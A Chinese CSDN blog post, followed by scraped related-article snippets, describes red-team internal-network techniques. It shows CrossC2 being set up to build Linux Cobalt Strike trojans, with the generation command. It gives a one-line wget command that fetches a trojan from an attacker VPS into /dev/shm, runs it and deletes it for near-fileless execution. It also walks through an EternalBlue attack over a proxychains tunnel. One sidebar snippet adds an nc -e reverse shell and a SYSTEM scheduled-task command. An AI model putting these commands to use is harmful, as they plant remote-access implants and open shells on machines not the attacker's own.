一些近来对内网攻防的思考

于 2024-05-14 12:27:17 发布
阅读量640 收藏 17
点赞数 12
文章标签: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/138824210
版权

  我知道我最近托更托了很久了,其实也不是小编懒啊

这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。

但是总不能不更吧     那就讲一下进来的一些内网攻防的思考吧

1.CrossC2上线Linux到CS(成功)

我么众所周知,CS是不能生成以及上线Linux的(再不配置插件的情况下),那么我们今天就带大家来配一下这个上线cs的插件

我就去kali上演示啦(你们在VPS上也是一样的,不过我VPS上已经配置好了,就不麻烦再配一次了)

我们先去github上下载这两个文件

GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload

然后我们先去解压缩那个ZIP

然后我们去CS加载这两个文件

这样,我们的CS就配置好了,然后我们去生成Linux的木马,找到另外的那个gen...linux的

先改权限,然后生成

./genCrossC2.Linux 你的VPS的ip VPS监听器的端口 null null Linux x64 木马名字

所以我就这么写咯

./genCrossC2.Linux 192.168.246.170 9191 null null Linux x64 muma

这里可以看见它的支持版本是4.9-4.1 ,要注意版本噢

然后我们去配置CS的监听器(只支持https 和tcp)

这个生成木马我应该就不用教了吧,不过记得要和木马对应IP和端口噢

然后就是去目标Linux上运行木马了!!!

但是呢,就真无语了

cs非常的安静

就连本地自己启动都上线不了。。。。。。。

我真无语了,那就用VPS上线一下吧!!!

还是先创建监听器,然后生成🐎

丢到目标服务器上去运行

可以看见两台机器都能上线,看来以后还是用VPS吧!!!

2.Bash无文件落地??

我们众所周知,Windos最出名的无文件落地,一定是powershell无文件落地(当然还有别的)

但是Linux呢??? 那肯定得有对应的无文件落地的啦!!! 下面这个连接讲的很详细

blogs/持久控制/Linux/Linux下的无文件攻击.md at master · aplyc1a/blogs · GitHub

这些方法好是好,但是对于脚本小子不友好!!! 假如我现在有一个Linux的马,然后又是脚本小子呢??

    ::: 我也想无文件啊!!!

那么就有接下来的命令

wget -U O -O - http://公网VPS/木马 > /dev/shm/木马 && chmod +x /dev/shm/木马 && /dev/shm/木马 && rm -f /dev/shm/木马
  1. 使用 wget 命令从公网VPS的地址下载文件。
  2. > 符号将下载的文件内容输出到 /dev/shm/木马 文件中。
  3. && 符号表示如果前一个命令执行成功,则继续执行下一个命令。
  4. 使用 chmod 命令添加 /dev/shm/木马 文件的执行权限。
  5. 使用 /dev/shm/木马 命令执行该文件,这个文件可能是一个 shell 脚本或可执行文件。
  6. 最后,使用 rm -f 命令删除 /dev/shm/木马 文件。

这个命令下载的文件被保存在 /dev/shm 目录下,该目录是一个临时文件系统,通常被用作内存文件系统,因此文件实际上是保存在内存中的。因此,即使在磁盘上删除了文件,内存中仍然存在这个文件的拷贝,因此删除磁盘上的文件不会影响正在内存中执行的程序。

所以你觉得这个算是无文件吗???? 

     ::感觉似乎不算,毕竟还有有文件落地得(只不过达到了一种类似无文件得效果)

那么下面就来演示一下,现在VPS上面开一个http得服务

然后直接一句话bash无文件落地

wget -U O -O - http://VPS:6888/shell > /dev/shm/shell && chmod +x /dev/shm/shell && /dev/shm/shell && rm -f /dev/shm/shell

直接上线

然后我们去看一下是否真的无文件(看一下目录下有没有)

但是在内存中还是能看见得

3.永恒之蓝shell进去会建立一个session?

以前我不是做过这样的一个实验吗?? 挂着跳板机去打内网的机器,很多时候本地不成功!!

那么我们今天Wireshark的角度上去分析一下!!!!! 

首先是一台Win7(存在永恒之蓝)

然后就是一台Server(也存在永恒之蓝)

首先我的Kali是192.168.246.170,先把他放在同一网段来打一下先

然后我们再去打一下Win7

好,两台都是能打到的,那么,我们把Win7放在内网,winserver放在公网

然后win7就变成内网52这个网段

然后winserver是双网卡,同时通两个网

然后我们去Winserver上开一个socks5的隧道!!!

然后我用kali的proxychains去连接

然后我们用proxychains去启动msf

果然打不成功,这个可能是因为虚拟机网络摇曳的原因,然而,今天我想讲的是另外一个东西

还是拿回我们原来的那个攻击成功的机器,我们众所周知,永恒之蓝是通过别人开放的445端口进行攻击的,那么他是通过445进行连接的吗????

我们在进攻成功之后,就可以有一个meterpreter的界面,然后我们去看一下连接

我们不难发现,我们并不是通过445端口进行连接的,而是通过重新找了一个端口来连接我们的kali  那么另外又一个问题来了,我们shell的时候,会建立一个新的连接吗??(PORT)

于是我shell了进去,并且抓了一下数据包,我们不难发现,我们kali都是通过用的4444端口进行对win7的通信,并不存在说新建立了一个端口来通信!!! 那执行命令呢????

可以看到它的整个tcp流,也是没有建立新的端口

所以我们就可以得到一个结论,只要我们能通过proxychains打到内网,那么就不用担心会新建端口导致的流量不通!!!    

所以以上失败的原因就是虚拟机摇曳!!!!!!

   

以上,就是一些暂时的想法了,写完这篇,小编又要投身到另一篇csdn上了!!!!

WanKING~~
关注
红队内网攻防渗透:内网渗透内网对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
HACKONE的博客
06-21 698
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
内网ARP攻防教程
10-03
超详细讲解ARP攻防 首次上传文件 希望大家捧场 积分并不是太高
内网安全攻防(一)
YUKIDDDD的博客
08-01 1067
第1章 内网基础知识1.1 内网基础知识 1.1 内网基础知识 内网也指局域网,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
内网攻防——内网渗透测试基础
duan_qiao925的博客
07-06 359
1.1内网基础知识 1.1.1工作组 工作组可以看做是一个社团或者部门,比如将技术部的所有电脑放进技术部这个工作组,将销售部的所有电脑放进销售部这个工作组,组内的电脑之间可以方便的访问彼此的共享资源,可以自由进出工作组,组内的电脑之间彼此对等没有服务器和客户机之分。 更改工作组:此电脑–>属性–>高级设置–计算机设置–更改。如果输入的工作组不存在则会创建。 1.1.2域 域是一个有安全便捷的计算机集合,要想访问域内资源需要以合法的身份登录域,而且与用户在域内的身份有关。 域控制器:是域中一台类似
内网安全攻防(三)
YUKIDDDD的博客
08-03 638
第3章 隐藏通信隧道技术3.1 基础知识3.2 网络层隧道技术3.3 传输层隧道技术3.4 应用层隧道技术3.5 SOCKS代理3.6 压缩数据3.7 上传和下载 3.1 基础知识 隧道是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原的后的数据包发送到响应的服务器上。 常用的隧道举例: 网络层:IPv6,ICMP,GRE 传输层:TCP,UDP,常规端口转发 应用层:SSH
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-20
内网安全攻防是网络安全领域中的重要组成部分,尤其是在企业或组织内部,内网的安全性直接影响到数据保护和业务运行的稳定...通过不断学习和实践,我们可以提高对内网安全的掌控力,从而更好地保护网络资源和数据安全。
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
SSH隧道是SSH的一种功能,它可以创建一个安全的数据通道,通过这个通道,可以实现对内网资源的访问,即使这些资源直接访问受限。 首先,我们讨论的是本地端口转发(Local Port Forwarding)。这种技术适用于小黑的...
远程控制软件VNC教程和对内网机器控制的实现整理.pdf
11-02
通过以上步骤,用户可以方便地实现对内网机器的远程控制,无论是在同一局域网内还是通过互联网,只要确保防火墙设置允许VNC通信,就能实现无缝的远程桌面操作。对于系统管理员和需要频繁远程协助的用户来说,VNC及其...
内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
闵行小鱼塘
04-07 4906
本篇开始阅读学习《内网安全攻防:渗透测试实战指南》,做个笔记 本篇是第一章内网渗透测试基础,基本都是些基础概念和环境搭建
内网渗透讲义
03-22
内网渗透讲义
内网安全攻防读书笔记(1)——内网基础知识
qq_40909772的博客
11-12 2409
文章目录1.工作组2.域2.1 单域2.2 父域和子域2.3 域树2.4 域森林2.5 域名服务器3.活动目录4.域控制器和活动目录的区别5.安全域的划分   内网也指局域网,是指在某一区域有多台计算机互连而成的计算机组。可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真等。 1.工作组   为了方便管理成白上千的计算机组成的局域网,出现了工作组的概念。实现手段就是将不同计算机按照功能或部门分别列入不同的工作组。   加入或者创建工作组的方法是:右击“我的电脑”,选择属性,依次
内网攻防学习Day1——常见的内网结构
最新发布
dzqxwzoe的博客
08-19 218
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。而实际上,因为域中的计算机是使用DNS来定位域控制器、服务器及其他计算机、网络服务的,所以域的名字就是DNS域的名字。每个域中都有独立的安全策略。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。
内网渗透|内网攻防—多级代理
include_voidmain的博客
03-03 6339
0x01前言 本文讲述由公司的一次内网靶场攻防,对多级代理的建立和配置进行分享,首先介绍一下靶场。 入口是有web漏洞的linux机器,横向到一个有漏洞的winPC上(双网卡),通过双网卡ms17-010到域成员机器上,最后打域控。 这里因为篇幅原因,不说攻打靶场的全过程,直接到frp隧道的建立和连接。 攻击机(kali):172.16.222.128 入口机:192.168.10.10 winPC:192.168.10.20/ 192.168.20.10 ms17-010: 192.168.20.20/
2021-8-29《内网安全攻防》第一章内网基础知识
qq_45290991的博客
08-30 944
这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。 第一章、内网基础知识 工作组: 所有计算机对等,没有cs之分。相当于分小组,加入、创建工作组:右键“计算机”--->属性--->更改设置--->在“计算机名”的一栏中写入想好的名称,在“工作组”一栏中写入想要加入的工作组名称。退出工作组:同法改变工作组名称即可。 域:有安全边界的计算机集合。分为: 单域:一个域,一般一个域需要两个dc,因为一个dc坏了还能备份恢复回来 父域 域树,子域只能使用父..
内网渗透学习
diqi0762的博客
03-25 1645
Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业...
网络攻防内网安全横向渗透权限提升
weixin_46626737的博客
06-30 755
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网攻防经典技术备忘录
KHOST的博客
02-26 754
前言 很早就想专门写一篇关于内网的文章,一直没有腾出空来,万万没想到,写下这篇文章的时候,竟然是我来某实验室实习的时间段:) 信息搜集 nmap扫描实时存活的ip nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ip...
使用nslookup检查外网对内网邮件服务器的解析
"这篇内容主要介绍了如何利用nslookup命令来检查外网能否解析到内网的邮件服务器。nslookup是一个用于测试DNS解析功能的命令行工具,适用于Windows操作系统。使用nslookup,用户可以查询域名对应的IP地址、CNAME记录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值